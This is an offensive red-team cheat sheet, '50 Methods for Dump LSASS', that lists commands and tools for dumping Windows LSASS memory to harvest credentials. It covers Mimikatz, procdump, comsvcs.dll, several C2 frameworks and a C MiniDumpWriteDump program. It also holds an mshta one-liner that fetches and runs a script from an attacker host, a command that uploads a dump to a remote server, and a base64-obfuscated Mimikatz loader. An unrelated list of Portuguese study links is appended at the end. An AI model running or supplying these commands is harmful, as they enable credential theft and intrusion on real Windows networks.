Prévia do material em texto
50 METHODS FOR DUMP LSASS
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Sekurlsa::logonpasswords
Sekurlsa::minidump
lsadump::dcsync
MIMIKATZ
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
procdump -ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe
lsass.dmp
PROCDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
System->LSASS process->Create Dump
PROCESS HACKER
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
tasklist /FI "IMAGENAME eq lsass.exe"
DumpIt.exe PID output_file_name.bin
DUMPIT
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
windbg -p <lsass process id>
.dump /ma c:\path\to\lsass.dmp
.detach
.q
WINDOWS DEBUGGING TOOLS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Create Disk Image
Physical Drive
Capture Memory
LSASS.exe
FTK IMAGER
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Pstree
volatility -f memory_dump.raw --
profile=Win7SP1x64 memdump -p
<lsass_pid> -D <output_directory>
VOLATILITY
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
winpmem.exe -o dump.raw
WINPMEM
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
windbg.exe -y
srv*c:\symbols*http://msdl.microsoft.com/downloa
d/symbols -i c:\symbols -z C:\hiberfil.sys
Yes
!process 0 0 lsass.exe
!process 0 0 lsass.exe; .dump /ma <output file
path>
HIBERFIL.SYS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
HKLM\SOFTWARE\Microsoft\Windows\Windo
ws Error Reporting\LocalDumps-
>DumpType->2
Lsass-Shtinkering.exe
WINDOWS ERROR REPORTING
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass PID]
.dump /ma [dump file path]
LIVEKD
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Powershell -ep bypass
Get-Process lsass
C:\Windows\System32\Taskmgr.exe
/dumpfile=C:\lsass.dmp /pid=<LSASS_PID>
TASK MANAGER
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Execute-assembly
SharpDump
Or
load sharpdump
sharpdump
COBALT STRIKE+SHARPDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Mimikatz_command
sekurlsa::minidump
COBALT STRIKE+MIMIKATZ_COMMAND
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
taskkill /f /im lsass.exe
COBALT STRIKE+TASKKILL
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
load sysinternals
Procexp
"File" -> "Save"
COBALT STRIKE+SYSINTERNALS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC
Weekly /D SAT /TN Commands /TR \"''rundll32.exe''
C:\\windows\\system32\\comsvcs.dll MiniDump
"+strPID+" C:\\Windows\\Tasks\\dump.bin full\" /ST
06:06:06 && Schtasks.exe /run /TN Commands &&
REM ' -Force;"
COBALT STRIKE+SCHTASKS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
load kiwi
Lsa_dump_sam
lsa_dump_secrets
BRUTE RATEL C4+KIWI
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
use post/windows/gather/credentials/lsassy
set SESSION <session ID>
Run or exploit
METASPLOIT+LSASSY
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Create Task->Module->SharpKatz
Arguments->lsa_dump
COVENANT+SHARPKATZ
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Modules
credentials/mimikatz/lsass_dump
Execute or run
sekurlsa::minidump
EMPIRE+WMIEXEC
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
use lsass_dump
Options
run
SLIVER+LSASS_DUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
villain.exe agent
villain.exe client -c <IP_ADDRESS>
villain.exe dump lsass
VILLAIN
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
pupy.exe shell --cmd "python -m
pupy.modules.pupywinutils.lsassdump -o
C:\temp\lsass.dmp"
OCTOPUS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
lsassdump
NIMPLANT
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MiniDumpWriteDump
Get-LsassDumpProcDump
POSHC2+MINIDUMPWRITEDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
NtQueryVirtualMemory
Get-LsassDumpNtQueryVirtualMemory
POSHC2+NTQUERYVIRTUALMEMORY
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Get-LsassDumpBloodHound
POSHC2+BLOODHOUND
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w
hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:
<port>/r.ps1')",0);close();
Manjusaka lsass dump
MANJUSAKA
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Dumpert.exe -k lsass.exe -s -o lsass.dmp
DUMPERT
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
NanoDump.exe -t [process ID] -o [output file
path]
NANODUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
spraykatz.exe -w <domain> -u <username>
-p <password> --krb5i --mimikatz
"sekurlsa::minidump lsass.dmp" "exit"
SPRAYKATZ
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle ID] -
dump
HANDLEKATZ
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
CallbackDump.exe -d <dump_file_path> -p
<process_id>
CALLBACKDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>
LSASSSILENTPROCESSEXIT
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
AndrewSpecial
andrew.dmp!
ANDREWSPECIAL
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\Masky.exe /ca:'CA SERVER\CA NAME'
(/template:User) (/currentUser)
(/output:./output.txt) (/debug:./debug.txt)
MASKY
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp
SHARPMINIDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MiniDump.exe /p <process_id> /o <output_file_name>
MINIDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Import-Module .\ReflectiveLsassDump.dll
Invoke-ReflectivePEInjection -PEBytes (Get-
Content ReflectiveLsassDump.dll -Encoding
Byte) -ProcessID (Get-Process lsass).Id
LSASSDUMPREFLECTIVEDLL
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MoonSolsWindowsMemoryToolkit.exe
Dumping->Launch DumpIt
LSASS->Select the process to dump
MOONSOLS WINDOWS MEMORY TOOLKIT
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
OpenProcess
MiniDumpWriteDump
MINIDUMPWRITEDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
#include <windows.h>
#include <dbghelp.h>
int main()
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, <lsass_process_id>);
if (hProcess == NULL)
{
printf("Failed to open process: %u\n", GetLastError());
return 1;
}
WCHAR dumpFileName[MAX_PATH];
swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");
HANDLE hDumpFile = CreateFile(dumpFileName, GENERIC_WRITE, 0, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("Failed to create dump file: %u\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
BOOL success = MiniDumpWriteDump(hProcess, <lsass_process_id>,
hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
if (!success)
{
printf("Failed to create minidump: %u\n", GetLastError());
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 1;
}
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 0;
}
```
regsvr32 comsvcs.dll
rundll32.exe
C:\Windows\System32\comsvcs.dll,
MiniDump lsass.exe lsass.dmp full
COMSVCS.DLL
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
MIRRORDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
dumpy.exe dump -k secretKey -u http://remotehost/upload force
DUMPY
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\procexp64.exe -accepteula /t
RToolZ -p <pid>
RTOOLZ+PROCEXP152.SYS
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process
lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process
lsass.exe --output lsass_dump.bin
SHARPUNHOOKER+LSASSUNHOOKER
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe
HASHDUMP
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COMInvoke-Obfuscation -ScriptBlock {
[System.Convert]::ToBase64String([System.IO.File]::ReadAll
Bytes('C:\mimikatz.exe')) } -Command 'Invoke-Expression
([System.Text.Encoding]::UTF8.GetString([System.Convert]::
FromBase64String("JABzAD0ATwB2AGkAZQBzAC4AQwBvA
G0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAU
wB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAG
MAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQ
BOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAH
MAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZA
BvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG
0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAA
oAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgA
ZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvA
HAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJ
wApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBn
ACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAd
AAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzA
GgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAK
QBdACkA")]))'
MIMIKATZ+INVOKE-OBFUSCATION
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Import-Module PowerSploit
Invoke-Mimikatz -DumpCreds
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
Sekurlsa::minidump
BETTERSAFETYKATZ
U
sage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
REDTEAMRECIPE.COM
RedTeamRecipe is a platform designed for cybersecurity professionals who want to learn more
about red teaming and penetration testing. Red teaming is a practice where an organization
simulates a real-world cyber attack to identify vulnerabilities and improve their security
measures.
HADESS.IOPOWERED BYMais conteúdos dessa disciplina
Estudo de Caso controle de automoçao- Protocolos no Sistema SCADA
- Mapa Mental - Instrumentação Industrial
- 13 piloto automatico
- Mapa Mental - Entrega Técnica
- 80633ee0-d0d8-4e9d-bde5-a587ff2c8b27
- (44)99162-8928 Um sistema de controle de temperatura utiliza um sensor associado a um controlador eletrônico, em que o valor de temperatura desejado pode ser submetido e um atuador é acionado
- (44)99162-8928 ATIVIDADE 1 - AURP - SISTEMAS DE CONTROLE - 52_2026
- 1- Considere um sistema de controle de posição aplicado a um atuador eletromecânico utilizado em processos industriais de alta precisão, como em máquinas CNC
- (44)99162-8928 b) Identifique os polos do sistema
- Em um sistema industrial, deseja-se controlar a velocidade de uma esteira transportadora utilizada em uma linha de produção Essa esteira é acionada por um motor elétrico cuja dinâmica pode ser modelad
- Para tornar mais ágil o trabalho de julgar as contas dos administradores e demais responsáveis por dinheiros, bens e valores públicos da Administra...
- Gestão de Relacionamento com Clientes e envolve a gestão de todos os aspectos do relacionamento do cliente com uma organização para aumentar a fide...
- A tecnologia RFID permite a identificação e o inventário das obras contidas no acervo bibliográfico de forma rápida e segura, sem erros, desde que....
- Técnica para converter a previsão de demanda de um item de demanda independente em uma programação das necessidades das partes componentes do item....
- Os Sistemas de Controle de Ambiente (SCA) são caracterizados como dispositivos que permitem: Controle de funções ambientais por comandos acessíveis Ex
- Os robôs industriais, baseados em pesquisas iniciadas após a Segunda Guerra Mundial, têm suas raízes na tecnologia desenvolvida para manipulação de ma
- onforme os estudos sobre automação industrial. Assinale a alternativa INCORRETA Segundo Lamb (2015), no início da década de 1960, quando a automação i
- Sobre Sistemas em Malha Aberta, analise as seguintes assertivas: I. Sistemas em Malha Aberta referem-se a sistemas nos quais a saída do sistema não in
- Na integração entre os painéis de controle e os dispositivos eletromecânicos, utilizados para automatização e preservação dos elevadores de carga, ...
- Um dos marcos da evolução dos sistemas de controle em subestações foi a padronização das comunicações. A norma que trata dessa padronização é a: A...
- eia as seguintes afirmações sobre instrumentação industrial. I. A cada dia, a indústria aumenta a procura por controle de processos. O domínio ad...
- 10) O intertravamento lógico não pode impedir uma válvula de se abrir enquanto outra não estiver completamente fechada. Verdadeira Falsa
- faça um resumo de: Impacto do Perfeccionismo: O perfeccionismo excessivo pode levar à frustração, insegurança e sobrecarga, tanto para o indivíduo ...
- No Oriente, a concepção de saúde e de doença seguia, e segue, um rumo diferente, mas de certa forma análogo ao da concepção hipocrática. A partir d...
- Dentro das atividades que compõem o processo do sistema organizacional, uma corresponde aos processos principais do negócio.Esta envolvida na fabri...
